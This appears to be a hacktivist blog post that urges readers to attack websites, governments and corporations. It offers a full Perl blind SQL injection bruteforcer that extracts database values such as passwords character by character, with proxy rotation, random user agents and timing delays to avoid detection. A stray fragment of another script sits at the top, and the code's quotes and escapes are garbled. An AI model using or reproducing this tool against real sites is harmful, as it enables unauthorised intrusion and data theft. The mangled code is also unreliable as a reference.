}}else{
   print “Error! Check the options and try again\n”;
}
sub openg{
  open(FG, “>>goodcodes.htm”);
}
sub openb{
  open(FB, “>>badcodes.htm”);
}

Blind SQL Injection Bruteforcer

Greetings Anons!

Our revolution has suffered much as of late, and it is necessary to step up our offensive methods. Defense is no longer the only option by which we can stick. We need to attack and take down oppressive websites, governments, and corporations worldwide. Below I have written a perl script for a blind sql bruteforcer. Enjoy and use with great fervor! Stay strong!

 

#!/usr/bin/perl
# Blind SQL Injection POC.omicronhatemail@gmail.com // TheRoyalAnon

use LWP::UserAgent;
use Getopt::Long;
use strict;

###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = \”GET\”;
my $default_time = \”0\”;
my $version = \”1.1\”;
my $default_useragent = \”bsqlbf $version\”;
my $default_dict = \”dict.txt\”;
my $default_sql = \”version()\”;
###############################################################################

$| = 1;

my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0; 
my $usedict = 0; 
my $amatch = 0;
my ($ua,$req);

###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent); 
my ($dict, $start, $length, $method, $cookie,$blind);
my $help;

my $options = GetOptions (
  \’help!\’           => \\$help, 
  \’url=s\’            => \\$url,
  \’sql=s\’             => \\$sql,
  \’blind=s\’           => \\$blind,
  \’match=s\’             => \\$match,
  \’charset=s\’       => \\$charset,
  \’start=s\’             => \\$start,
  \’length=s\’       => \\$length,
  \’dict=s\’           => \\$dict,
  \’method=s\’       => \\$method,
  \’uagent=s\’       => \\$uagent,
  \’ruagent=s\’       => \\$ruagent,
  \’cookie=s\’       => \\$cookie,
  \’proxy=s\’          => \\$proxy,
  \’proxy_user=s\’     => \\$proxy_user,
  \’proxy_pass=s\’     => \\$proxy_pass,
  \’rproxy=s\’     => \\$rproxy,
  \’debug!\’           => \\$debug, 
  \’rtime=s\’           => \\$rtime, 
  \’time=i\’           => \\$time );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$abc          = charset();
$uagent     ||= $default_useragent; 
$debug    ||= $default_debug; 
$length     ||= $default_length; 
$solution     ||= $start;
$method     ||= $default_method;
$sql         ||= $default_sql;
$time         ||= $default_time;

&createlwp();
&parseurl();

if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }

if (!$match) {
    print \”\\nTrying to find a match string…\\n\” if $debug eq 1;
    $amatch = \”1\”;
    &auto_match();
}

&banner();
&httpintro();
&bsqlintro();
 
#########################################################################
# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)

$dict ||= $default_dict;
open DICT,\”$dict\”;  @dic=<DICT>; close DICT;

my $i;
my $nodict = 0;
for ($i=length($start)+1;$i<=$length;$i++) {
    my $furl;
    my $find = 0;
    $abc = charset();
    &bsqlintro if $debug eq 1;
    print \”\\r trying: $solution \”;
    foreach (split/ */,$abc) {
        $find = 0; 
        $char = ord();
        $string = \” AND MID($sql,$i,1)=CHAR($char)\”;
        if (lc($method) eq \”post\”) {
           $vars{$lastvar} = $lastval . $string;
        }
        print \”\\x08$_\”;
        $furl = $url;
        $furl =~ s/($lastvar=$lastval)/$1$string/;
        &createlwp if $rproxy || $ruagent;
        my $html=fetch(\”$furl\”);
        $hits++;
        foreach (split(/\\n/,$html)) {
             if (/\\Q$match\\E/) { 
                my $asc=chr($char);
                $solution .= $asc;
                $find = 1;
             }
            last if $find eq \”1\”;
            }
        last if $find eq \”1\”;
    }
    if ($usedict ne 0 && $find eq 0) { $nodict=1; $i–; }
    if ($find eq \”0\” && $usedict eq \”0\”) { last; };
}

&result();

#########################################################################
sub httpintro {
    my ($strcookie, $strproxy, $struagent, $i);
    print \”–[ http options ]\”; print \”-\”x62; print \”\\n\”;
    printf (\”%12s %-8s %11s %-20s\\n\”,\”schema:\”,$scheme,\”host:\”,$authority);
    if ($ruagent) { $struagent=\”rnd:$ruagent\” } else { $struagent = $uagent }
    printf (\”%12s %-8s %11s %-20s\\n\”,\”method:\”,uc($method),\”useragent:\”,$struagent);
    printf (\”%12s %-50s\\n\”,\”path:\”, $path);
    foreach (keys %vars) {
        $i++;
        printf (\”%12s %-15s = %-40s\\n\”,\”arg[$i]:\”,$_,$vars{$_});
    }
    if (! $cookie) { $strcookie=\”(null)\” } else { $strcookie = $cookie; }
    printf (\”%12s %-50s\\n\”,\”cookies:\”,$strcookie);
    if (! $proxy && !$rproxy) { $strproxy=\”(null)\” } else { $strproxy = $proxy; }
    if ($rproxy) { $strproxy = \”rnd:$rproxy\” }
    printf (\”%12s %-50s\\n\”,\”proxy_host:\”,$strproxy);
    if (! $proxy_user) { $strproxy=\”(null)\” } else { $strproxy = $proxy_user; }
    printf (\”%12s %-50s\\n\”,\”proxy_user:\”,$strproxy);
}

sub bsqlintro {
    my ($strstart, $strblind, $strlen, $strmatch, $strsql);
    print \”\\n–[ blind sql injection options ]\”; print \”-\”x47; print \”\\n\”;
    if (! $start) { $strstart = \”(null)\”; } else { $strstart = $start; }
    if (! $blind) { $strblind = \”(last) $lastvar\”; } else { $strblind = $blind; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”blind:\”,$strblind,\”start:\”,$strstart);
    if ($length eq $default_length) { $strlen = \”$length (default)\” } else { $strlen = $length; }
    if ($sql eq $default_sql) { $strsql = \”$sql (default)\”; } else { $strsql = $sql; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”length:\”,$strlen,\”sql:\”,$strsql);
    printf (\”%12s %-50s\\n\”,\”charset:\”,$abc);
    if ($amatch eq 1) { $strmatch = \”auto match:\” } else { $strmatch = \”match:\”; }
    #printf (\”%12s %-60s\\n\”,\”$strmatch\”,$match);
    print \” $strmatch $match\\n\”;
    print \”-\”x80; print \”\\n\\n\”;
}
#########################################################################

sub createlwp {
    my $proxyc;
    &getproxy;
    &getuagent;
    LWP::Debug::level(\’+\’) if $debug gt 3;
    $ua = new LWP::UserAgent(
        cookie_jar=> { file => \”$$.cookie\” }); 
    $ua->agent(\”$uagent\”);
    if (defined($proxy_user) && defined($proxy_pass)) {
        my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
        $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        $proxyc = $pscheme.\”://\”.$proxy_user.\”:\”.$proxy_pass.\”@\”.$pauthority;
    } else { $proxyc = $proxy; }
    
    $ua->proxy([\’http\’] => $proxyc) if $proxy;
    undef $proxy if $rproxy;
    undef $uagent if $ruagent;
}    

sub cookie {
    # Cookies check
    if ($cookie || $cookie =~ /; /) {
        foreach my $c (split /;/, $cookie) {
            my ($a,$b) = split /=/, $c;
            if ( ! $a || ! $b ) { die \”Wrong cookie value. Use -h for help\\n\”; }
        }
    }
}

sub parseurl {
 ###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
    # Parse args of URI into %vars and @varsb.
    foreach my $varval (split /&/, $query) {
        my ($var, $val) = split /=/, $varval;
        $vars{$var} = $val;
        push(@varsb, $var);
    }
}

sub charset {
    if ($hits ne 0 && $nodict eq 0) {
        my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
        foreach my $line (@dic) {
            chomp $line; 
               if ($line =~ /\\Q$solution\\E/ && $line !~ /^#/) {
                $foo = $line; $foo =~ s/\\Q$solution\\E//;
                 foreach ((split/ */,$foo)) {
                      if ($tmp{$_} ne \”1\” ) {
                        $tmp{$_} = \”1\”; push (@b,$_);
                    }
                 }
            }
        }
            if ($#b >= 0) {
            foreach my $c (@b) { $abc .=$c;}
            $usedict = $abc;
            print \”\\nUsing a dictionary with this charset: $abc\\n\” if $debug eq 1;
         } else {
            $abc = chardefault()
         }
    } else {
            $abc = chardefault()
    }
    return $abc;
}

sub chardefault {
    my $tmp;
    $abc = $charset;
    if (lc($charset) eq \”md5\”) {
        $abc = \”abcdef0123456789\\$.\”;
    } elsif (lc($charset) eq \”num\”) {
        $abc = \”0123456789\”;
    } elsif (lc($charset) eq \”all\” || ! $charset) {
           $abc = \”abcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\”;
    }
    # If a dictionary has been used before, remove chars from current charset
    if ($usedict ne 0) {
        foreach (split(/ */, $usedict)) {
            $abc =~ s/$_//;
        }
    }
    $usedict = 0;
    return $abc;
}

sub auto_match {
      $match = fmatch(\”$url\”);
}

#########################################################################
# Show options at running:
sub banner {
    print \”\\n // Blind SQL injection brute force.\\n\”;
    print \” // downloaded from securityoverride.com\\n\\n\”;
}

#########################################################################
# Get differences in HTML
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb) = ($_[0], $_[0]);
 my ($html_a, $html_b);
 if (lc($method) eq \”get\”) {
    $furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
    $furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
     $html_a = fetch(\”$furla\”);
    $html_b = fetch(\”$furlb\”);
 } elsif (lc($method) eq \”post\”) {
   $vars{$lastvar} = $lastval . \” AND 1=1\”;
   $html_a = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval . \” AND 1=0\”;
   $html_b = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval;
 }
 my @h_a = split(/\\n/,$html_a);
 my @h_b = split(/\\n/,$html_b);
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\\w/) {
           foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}

#########################################################################
# Fetch HTML from WWW
sub fetch {
    my $secs;
    if ($time eq 0) { $secs = 0 }
    elsif ($time eq 1) { $secs = 15 }
    elsif ($time eq 2) { $secs = 300 }
    if ($rtime =~ /\\d*-\\d*/ && $time eq 0) {
        my ($l,$p) = $rtime =~ m/(\\d+-\\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\\d*-\\d*/ && $time ne 0) {
        print \”You can\’t run with -time and -rtime. See -help.\\n\”;
        exit 1;
    }
    sleep $secs;
    
    my $res;
    if (lc($method) eq \”get\”) {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get(\”$fetch\”, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->get(\”$fetch\”);
        }
    } elsif (lc($method) eq \”post\”) {
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        my $fetch = \”$s://$a\”.$p;
        if ($cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars);
        }
    } else {
        die \”Wrong httpd method. Use -h for help\\n\”;
    }
    my $html = $res->content();
    return $html;
}

sub getproxy {
    if ($rproxy && $proxy !~ /http/) {
        my @lproxy;
        open PROXY, $rproxy or die \”Can\’t open file: $rproxy\\n\”;
        while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
        close PROXY;
        srand; my $ind = rand @lproxy;
        $proxy = $lproxy[$ind];
    } elsif ($rproxy && $proxy =~ /http/)  {
        print \”You can\’t run with -proxy and -rproxy. See -help.\\n\”;
        exit 1;
    }
}

sub getuagent {
    if ($ruagent && $uagent !~ /bsqlbf/) {
        my @uproxy;
        open UAGENT, $ruagent or die \”Can\’t open file: $ruagent\\n\”;
        while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
    } elsif ($ruagent && $uagent !~ /bsqlbf/)  {
        print \”You can\’t run with -uagent and -ruagent. See -help.\\n\”;
        exit 1;
    }
}

sub result {
    print \”\\r results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 0;
    print \”\\n results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 1;
    print \” total hits: $hits\\n\”;
}

sub help {
    &banner();
    print \” usage: $0 <-url http://www.host.com/path/script.php?foo=bar&gt; [options]\\n\”;
    print \”\\n options:\\n\”;
    print \” -sql:\\t\\tvalid SQL syntax to get; connection_id(), database(),\\n\”;
    print \”\\t\\tsystem_user(), session_user(), current_user(), last_insert_id(),\\n\”; 
    print \”\\t\\tuser() or all data available in the requested query, for\\n\”;
    print \”\\t\\texample: user.password. Default: version()\\n\”;
    print \” -blind:\\tparameter to inject sql. Default is last value of url\\n\”;
    print \” -match:\\tstring to match in valid query, Default is try to get auto\\n\”;
    print \” -charset:\\tcharset to use. Default is all. Others charsets supported:\\n\”;
    print \” \\tall:\\tabcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\\n\”;
    print \” \\tnum:\\t0123456789\\n\”;
    print \” \\tmd5:\\tabcdef0123456789\\$\\n\”;
    print \” \\tcustom:\\tyour custom charset, for example: \\\”abc0123\\\”\\n\”;
    print \” -start:\\tif you know the beginning of the string, use it.\\n\”;
    print \” -length:\\tmaximum length of value. Default is $default_length.\\n\”;
    print \” -dict:\\t\\tuse dictionary for improve speed. Default is dict.txt\\n\”;
    print \” -time:\\t\\ttimer options:\\n\”;
    print \” \\t0:\\tdont wait. Default option.\\n\”;
    print \” \\t1:\\twait 15 seconds\\n\”;
    print \” \\t2:\\twait 5 minutes\\n\”;
    print \” -rtime:\\twait random seconds, for example: \\\”10-20\\\”.\\n\”;
    print \” -method:\\thttp method to use; get or post. Default is $default_method.\\n\”;
    print \” -uagent:\\thttp UserAgent header to use. Default is $default_useragent\\n\”;
    print \” -ruagent:\\tfile with random http UserAgent header to use.\\n\”;
    print \” -cookie:\\thttp cookie header to use\\n\”;
    print \” -rproxy:\\tuse random http proxy from file list.\\n\”;
    print \” -proxy:\\tuse proxy http. Syntax: -proxy=http://proxy:port/\\n\”;
    print \” -proxy_user:\\tproxy http user\\n\”;
    print \” -proxy_pass:\\tproxy http password\\n\”;
    print \”\\n example:\\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \\\”user()\\\”\\n\”;
    exit(1);